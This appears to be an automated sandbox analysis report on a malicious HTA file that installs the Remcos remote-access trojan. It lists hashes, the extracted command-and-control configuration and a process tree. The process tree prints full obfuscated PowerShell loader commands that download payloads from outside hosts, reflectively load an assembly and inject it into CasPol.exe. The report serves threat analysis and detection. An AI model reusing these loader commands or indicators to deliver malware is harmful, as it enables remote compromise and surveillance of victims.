Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
26-11-2024 08:16
Static task
static1
Behavioral task
behavioral1
Sample
sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta
Resource
win10v2004-20241007-en
General
-
Target
sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta
-
Size
599KB
-
MD5
5a9dc05899d1a19be638824e5f47b88e
-
SHA1
418e5c2cfc4ba40069bbcbc7373e9ff0b71740f2
-
SHA256
741297ecc59d39296f360b100032cdb120af2eb4ccc5b91f370c0eacb9ee7e25
-
SHA512
0772c9718b79ccff96ed8631ad22d117876c1cb5f1b9313494051e52a63b8f360d8f5fc81beaee296e120a873e99414818bb36db6bf795dfe99d54b3f47f4d7e
-
SSDEEP
192:4dE6COljVneLyZXcFeLyZXcEeLyZXc/Czt4kQ:b6COljV+zO7
Malware Config
Extracted
https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c
https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c
Extracted
remcos
RemoteHost
nextnewupdationsforu.duckdns.org:14645
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-EC111K
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Blocklisted process makes network request 3 IoCs
flow pid Process 13 4248 POwersheLL.exE 18 2436 powershell.exe 23 2436 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 3364 powershell.exe 2436 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 4248 POwersheLL.exE 3820 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2436 set thread context of 1388 2436 powershell.exe 106 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language POwersheLL.exE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings POwersheLL.exE -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 4248 POwersheLL.exE 4248 POwersheLL.exE 3820 powershell.exe 3820 powershell.exe 3364 powershell.exe 3364 powershell.exe 2436 powershell.exe 2436 powershell.exe 2436 powershell.exe 2436 powershell.exe 2436 powershell.exe 2436 powershell.exe 2436 powershell.exe 2436 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4248 POwersheLL.exE Token: SeDebugPrivilege 3820 powershell.exe Token: SeDebugPrivilege 3364 powershell.exe Token: SeDebugPrivilege 2436 powershell.exe -
Suspicious use of WriteProcessMemory 40 IoCs
description pid Process procid_target PID 1564 wrote to memory of 4248 1564 mshta.exe 83 PID 1564 wrote to memory of 4248 1564 mshta.exe 83 PID 1564 wrote to memory of 4248 1564 mshta.exe 83 PID 4248 wrote to memory of 3820 4248 POwersheLL.exE 85 PID 4248 wrote to memory of 3820 4248 POwersheLL.exE 85 PID 4248 wrote to memory of 3820 4248 POwersheLL.exE 85 PID 4248 wrote to memory of 232 4248 POwersheLL.exE 91 PID 4248 wrote to memory of 232 4248 POwersheLL.exE 91 PID 4248 wrote to memory of 232 4248 POwersheLL.exE 91 PID 232 wrote to memory of 4608 232 csc.exe 92 PID 232 wrote to memory of 4608 232 csc.exe 92 PID 232 wrote to memory of 4608 232 csc.exe 92 PID 4248 wrote to memory of 964 4248 POwersheLL.exE 95 PID 4248 wrote to memory of 964 4248 POwersheLL.exE 95 PID 4248 wrote to memory of 964 4248 POwersheLL.exE 95 PID 964 wrote to memory of 3364 964 WScript.exe 96 PID 964 wrote to memory of 3364 964 WScript.exe 96 PID 964 wrote to memory of 3364 964 WScript.exe 96 PID 3364 wrote to memory of 2436 3364 powershell.exe 101 PID 3364 wrote to memory of 2436 3364 powershell.exe 101 PID 3364 wrote to memory of 2436 3364 powershell.exe 101 PID 2436 wrote to memory of 3412 2436 powershell.exe 103 PID 2436 wrote to memory of 3412 2436 powershell.exe 103 PID 2436 wrote to memory of 3412 2436 powershell.exe 103 PID 2436 wrote to memory of 4812 2436 powershell.exe 104 PID 2436 wrote to memory of 4812 2436 powershell.exe 104 PID 2436 wrote to memory of 4812 2436 powershell.exe 104 PID 2436 wrote to memory of 2260 2436 powershell.exe 105 PID 2436 wrote to memory of 2260 2436 powershell.exe 105 PID 2436 wrote to memory of 2260 2436 powershell.exe 105 PID 2436 wrote to memory of 1388 2436 powershell.exe 106 PID 2436 wrote to memory of 1388 2436 powershell.exe 106 PID 2436 wrote to memory of 1388 2436 powershell.exe 106 PID 2436 wrote to memory of 1388 2436 powershell.exe 106 PID 2436 wrote to memory of 1388 2436 powershell.exe 106 PID 2436 wrote to memory of 1388 2436 powershell.exe 106 PID 2436 wrote to memory of 1388 2436 powershell.exe 106 PID 2436 wrote to memory of 1388 2436 powershell.exe 106 PID 2436 wrote to memory of 1388 2436 powershell.exe 106 PID 2436 wrote to memory of 1388 2436 powershell.exe 106
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\SysWOW64\WInDowSpoWeRShell\V1.0\POwersheLL.exE"C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'JFM1UFpiNiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJERUZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhwSGhsTndBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRSdEdKUEJ0ZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaEFVYVRQUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjTWFReEFTWWhsSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInhaQm5VRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NzVWlPTklmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRTNVBaYjY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjQ2LjI2LzE0MjIvYmVzdG9mdGhpbmdzd2l0aGVudGlyZXRpbWVnaXZlbmVic3R0aGlnbnN0b2Rvd2l0aGdyZWF0LnRJRiIsIiRFblY6QVBQREFUQVxiZXN0b2Z0aGluZ3N3aXRoZW50aXJldGltZWdpdmVuZWJzdHRoaWduc3RvZG93aXRoZy52QnMiLDAsMCk7U3RhclQtc2xFRVAoMyk7SWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGJlc3RvZnRoaW5nc3dpdGhlbnRpcmV0aW1lZ2l2ZW5lYnN0dGhpZ25zdG9kb3dpdGhnLnZCcyI='+[cHaR]0x22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4248 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3820
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zaarxcoa\zaarxcoa.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:232 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCA35.tmp" "c:\Users\Admin\AppData\Local\Temp\zaarxcoa\CSCE72E31917781472FBA308DC59AF7AB.TMP"4⤵
- System Location Discovery: System Language Discovery
PID:4608
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnMmtkaW1hZycrJ2VVcmwgPSBlQzRodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlLycrJ2dldD9maWxla2V5PXMnKydoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtJysnZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBlQzQ7Mmtkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsya2RpbWFnZUJ5dGVzID0gMmtkd2ViQ2xpZW50LkRvdycrJ24nKydsb2FkRGF0YSgya2RpbWFnZVVybCk7MmtkaW1hZ2VUZXh0ID0gJysnW1N5c3RlbS5UZScrJ3h0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoMmtkaW1hZ2VCeXRlcycrJyk7Mmtkc3RhcnRGbGFnID0gZUM0PDxCQVNFNjRfU1RBUlQ+PmVDJysnNDsya2RlbmRGbGFnID0gZUM0PDxCQVNFNjRfRU5EPj5lQzQ7Mmtkc3RhcnRJbmRleCA9IDJrZGltYWdlVGV4dC5JbmRleE9mKDJrZHN0YXJ0RmxhZyk7MmtkZScrJ24nKydkSW5kZXggPSAya2RpbWFnZVRleHQuSW5kZXgnKydPZigya2RlbmRGbGEnKydnKTsya2RzdGFydEluZGV4IC1nZSAwIC1hbmQgMmtkZW5kSW5kZXggLWd0IDJrZHN0YXInKyd0SW5kZXg7Mmtkc3RhcnRJbmRleCArPSAya2RzdGFydEZsYWcuTGVuZ3QnKydoOzJrZGJhc2U2NExlbmd0aCA9IDJrZGVuZEluZGV4IC0gMmtkc3RhcnRJbmRleDsya2RiYXNlNjRDb21tYW5kID0gMmsnKydkaW1hZ2VUJysnZXh0LlN1YnN0cmluZygya2RzdGFydEluZGV4LCAya2RiYXNlNjRMZW5ndGgpOzJrZGJhc2U2NFJlJysndmVyc2VkID0gLWpvaW4gKDJrZGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBzeVYgRm9yRWFjaC1PYmplY3QgeyAya2RfIH0pWy0xLi4tKDJrZGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07MmtkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhcycrJ2U2NFN0cmluZygya2RiYXNlNjRSZXZlcnNlZCk7MmtkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKDJrZGNvbW1hbmRCeXRlcyk7MmtkdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChlQzRWQUllQzQpOzJrZHZhaU1ldGhvZC5JbnZva2UoJysnMmtkbnVsbCwgQChlQzR0eHQuRkdWR0ZSLzIyNDEvNjIuNjQuOCcrJzYxLjQwMS8vOnB0dGhlQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsJysnIGVDNENhc1BvbGVDNCwgZUM0ZGVzYXRpdmFkb2VDNCwgZUM0ZGVzYXRpdmFkb2VDNCxlQycrJzRkZXNhdGl2YWRvJysnZUM0LGVDNGRlc2F0aScrJ3ZhZG9lQzQsZUM0ZGVzYXRpdmFkb2VDNCxlQzRkZXNhdGl2YWRvZUM0LGVDNGRlc2F0aXZhZG9lQycrJzQsZUM0MWVDNCxlQzRkZXNhdGl2YWRvZUM0KSk7JykgIC1jcmVwbEFDZSAgKFtjaEFSXTExNStbY2hBUl0xMjErW2NoQVJdODYpLFtjaEFSXTEyNCAgLVJlUExBY2UgIChbY2hBUl01MCtbY2hBUl0xMDcrW2NoQVJdMTAwKSxbY2hBUl0zNiAtY3JlcGxBQ2UnZUM0JyxbY2hBUl0zOSl8IC4oKGd2ICcqTURyKicpLk5BTWVbMywxMSwyXS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3364 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);2kdvaiMethod.Invoke('+'2kdnull, @(eC4txt.FGVGFR/2241/62.64.8'+'61.401//:pttheC4, eC4desativadoeC4, eC4desativadoeC4, eC4desativadoeC4,'+' eC4CasPoleC4, eC4desativadoeC4, eC4desativadoeC4,eC'+'4desativado'+'eC4,eC4desati'+'vadoeC4,eC4desativadoeC4,eC4desativadoeC4,eC4desativadoeC'+'4,eC41eC4,eC4desativadoeC4));') -creplACe ([chAR]115+[chAR]121+[chAR]86),[chAR]124 -RePLAce ([chAR]50+[chAR]107+[chAR]100),[chAR]36 -creplACe'eC4',[chAR]39)| .((gv '*MDr*').NAMe[3,11,2]-jOiN'')"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2436 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵PID:3412
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵PID:4812
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵PID:2260
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵
- System Location Discovery: System Language Discovery
PID:1388
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
12KB
MD59f09699d3e52cd0447851ea5488ce0a5
SHA1b40c6ddcd5eb00d9d567cb3cc68afb43f8c4fa72
SHA25610ec638e455219ef6e20ec8243560e0cd14a0ecb60d63c4c48cbed57e0c8b6c1
SHA512ba17fb9a4c08613514cf6255ed954a4d2b01a912b86ee87d411618819b28a0f0663b746c4acd97bec2aff7b460b722f247a004f677f0a8d536bb4cc0ba3afa4a
-
Filesize
18KB
MD58c688edf8135820bd72059964a3baaa5
SHA160469fdcb87dbd894e131f8df7f89036d3a9efc2
SHA2563a4984458ef310a5c29e59a9a9e28c28a0652ea388bfa1b705e675cf644b3227
SHA512b9dcf0be09b5631dae791b43fac530cc93adf690317e093c75190e5e545dc60d0b04394032fd1b80f0c0af2d9cd84626cff49ed96d57d0e8f2c503eebbaf34db
-
Filesize
1KB
MD593009251a7ddeda68412359559106f30
SHA1519439d8a540dd2afe2e79f95462ae341d8894f2
SHA256f3151a1f07020ab712a69ffe04e326ba84b383f9b26f54780fb7bfef95dfc552
SHA5127179d253996b9897ccbf9df08d50934e1a928756948043eba53c1b3d4ee391e530835ce2001ef7043be5c6895f74c5352770faa3011a815235f5f98e928502ef
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD559148d3823258fb6a77cdc683a5d28c6
SHA1a89378a55f392dc96a662354c1233259c8473e01
SHA256cd440d745da8737ed3efe15ec5f11451f669fad1c79cc78f285a1ed6e5e8c620
SHA5120fa38729b98f854609f7a662844e89dd7ca1aeab88b9fc1926cbdece57fbcaadaf976f3c2f1c37fab8bbe84fdd681c7b3ab71d280a065f2ccf8d641f5aca2528
-
Filesize
162KB
MD58ba4e1dcc487bd110b4bcd41e7ee2ba5
SHA11881afff1eb946fdb3ee62133ca43d0bc136ac37
SHA2564bcb2f9b3a929bd940484218ef0a8c03842480a15bd8a3c4521f5097bd89d581
SHA512006b7dcfdb7ee27ca1e6aa536c2399321966ffc3b82bc0f86470614345b6e0a2a1ed1d7a143c500669fba375f9706cff8ed421502df7f12f49c3260dc5a8bde4
-
Filesize
652B
MD5b2abe629df8b4ff33c82a2a75fe8358e
SHA148337dc03aa817c42eb27ed7a0090af34bdb681d
SHA2564a62bef0d425998b3adb0cd11f23f70fb3c74fdbdc3018578c6dadc3e9d3060d
SHA5129f7822d4abbf4d56ee853ef269ae7ed8db9a5668a320e1e66b2c94eca2a03286eaa847de10aa67e2dfb6a1dc62a6682f12590d2aa103716955db0684eb804e3c
-
Filesize
488B
MD5df59540f8edd52a40245b77825076b5c
SHA1101a773a82eef36b277291d6e450d4984136b176
SHA256041ed2f3f184dd53c0b2bacbe7e55a05a747a3ed1aa2cab0e8c93e9ab25a121f
SHA512790e1139eab1d895386730743ea05b591820178b76fec615acab192ad8d2c5960703cebc2c6f4efc8158020506f35cb69ae6545c649e3d87b74845fbc2ec1990
-
Filesize
369B
MD533ff17f8e7372f1241cac947e632f8af
SHA1743d01c8ba5ce4ba7ff42a5c032e2e5a3faa4cb3
SHA2569196f954cac6ebe34c80f3b2eb8453fb1911f30f8a81e02106b82fa0f0ac0e92
SHA512696bb210ad7dbf64d624117ef7538befc4a850a3ace3d63d31cbfc395ad582ab5bbdf247b1fc04105d291ee3d52d85ef74c8bc4c6ed7f8a867381a58014e66c9